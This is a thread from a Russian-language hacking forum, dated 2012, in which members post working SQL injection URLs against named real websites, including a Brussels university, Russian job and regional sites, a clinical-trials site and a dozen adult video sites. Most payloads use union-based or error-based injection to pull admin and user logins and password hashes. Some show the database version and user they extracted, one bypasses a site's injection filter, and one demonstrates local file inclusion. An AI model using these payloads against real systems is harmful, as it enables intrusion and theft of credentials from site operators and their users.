 |
|
20.02.2012, 22:42
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
какой то там университет Брюселя внутри таблы экзаменов за 2012 и т д (админку было искать лень)
Код:
http://huis.vub.ac.be/lessenlees.php?lescode=-117+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+RageUsers+limit+1,1--+
|
|
|
21.02.2012, 00:16
|
|
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами:
8029046
Репутация:
9
|
|
тИЦ: 140
Сообщение от None
http://lazalka.ru/unit.php?id=-1+UNION+SELECT+concat%28version%28%29,user%28%29%2 9,2,3,4,5,6,7,8,9,10--
Вывод в соурсе:
Сообщение от None
|
|
|
|
22.02.2012, 02:06
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
в админку не пускает((( не нравится мой айпи((( http://101rabota.ru/admin/
http://www.101rabota.ru/allrez.php?showgr=-5+union+select+1,concat(login,0x3a,password),3333, 4,5+from+users_admin+limit+0,1+--+
|
|
|
|
22.02.2012, 16:56
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Код:
http://www.uveitisclinicaltrials.com/index.php?option=com_sl&view=form&site_id=-30'+union+select+concat_ws(0x3a,username,password,usertype,0x4861636b6564206279204572656565)+from+jos_users+limit+0,1--+f
|
|
|
|
22.02.2012, 21:25
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
SQL INJECTION (error-based) && Local File Include
Для проведения SQL Inj необходимо посылать кавычку не url-кодируя ее в %27.
В бд идет $_SERVER['REQUEST_URI'], так что ваши параметры не декодируются автоматически.
INSERT запрос.
Код:
http://www.zvuk.uu.ru/catalog/article.php?file=ololosha'or%28select/**/count%28*%29/**/from/**/%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28version%28%29,floor%28rand%280%29*2%29%29%29and'
version(): 4.1.15-log
user(): 3wzvuk@deimos.surnet.ru
SAFE MODE = On
Инклуд картинки для примера:
Код:
http://www.zvuk.uu.ru/catalog/article.php?file=../../../catalog/images/logo.gif
|
|
|
|
25.02.2012, 02:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Код:
http://www.ballarat.com/bookingservice/booking_request.php?id=-664+UNION+SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127+from+information_schema.tables+limit+16,1+--+
|
|
|
|
26.02.2012, 09:19
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Код:
http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.toptrannysex.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://smoketube.tv/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.bukkakevideos.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://mobile.youngporngirlz.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://mobile.pornstarblitz.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.gay-bukkake.org/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://mobile.boinktube.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.publicdomaintube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.standupcomedyspot.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.freepornmarttube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
|
|
|
|
26.02.2012, 11:14
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
http://www.yuzhno-sakhalinsk.net/object.php?pg=2&type=-146%20union%20select%201,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--
5.1.41-log tiba102_info@212.193.227.175 tiba102_info portbld-freebsd7.2
|
|
|
|
26.02.2012, 14:58
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Код:
http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1+union+select%201,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=
YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'name=photo&u=Stalker%20XL&un=1&clan=BlackCompany% 27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8, 9,10%20--%20f&sex=1&level=7&align='.
NUKECOPS, ох лол:
%0Aunion%0A
Код:
http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1%0Aunion%0Aselect%201,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=
|
|
|
|
27.02.2012, 18:18
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
В ТОПКУ
http://uanato.info/index.php?pokaz=-7690%20and%201=2%20union%20select%201,2,3,4,concat _ws(char(58),@@version,user(),database(),@@version _compile_os),6+--
4.1.22-standard-log ospuai_ospuai@localhost ospuai_nato pc-linux-gnu |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
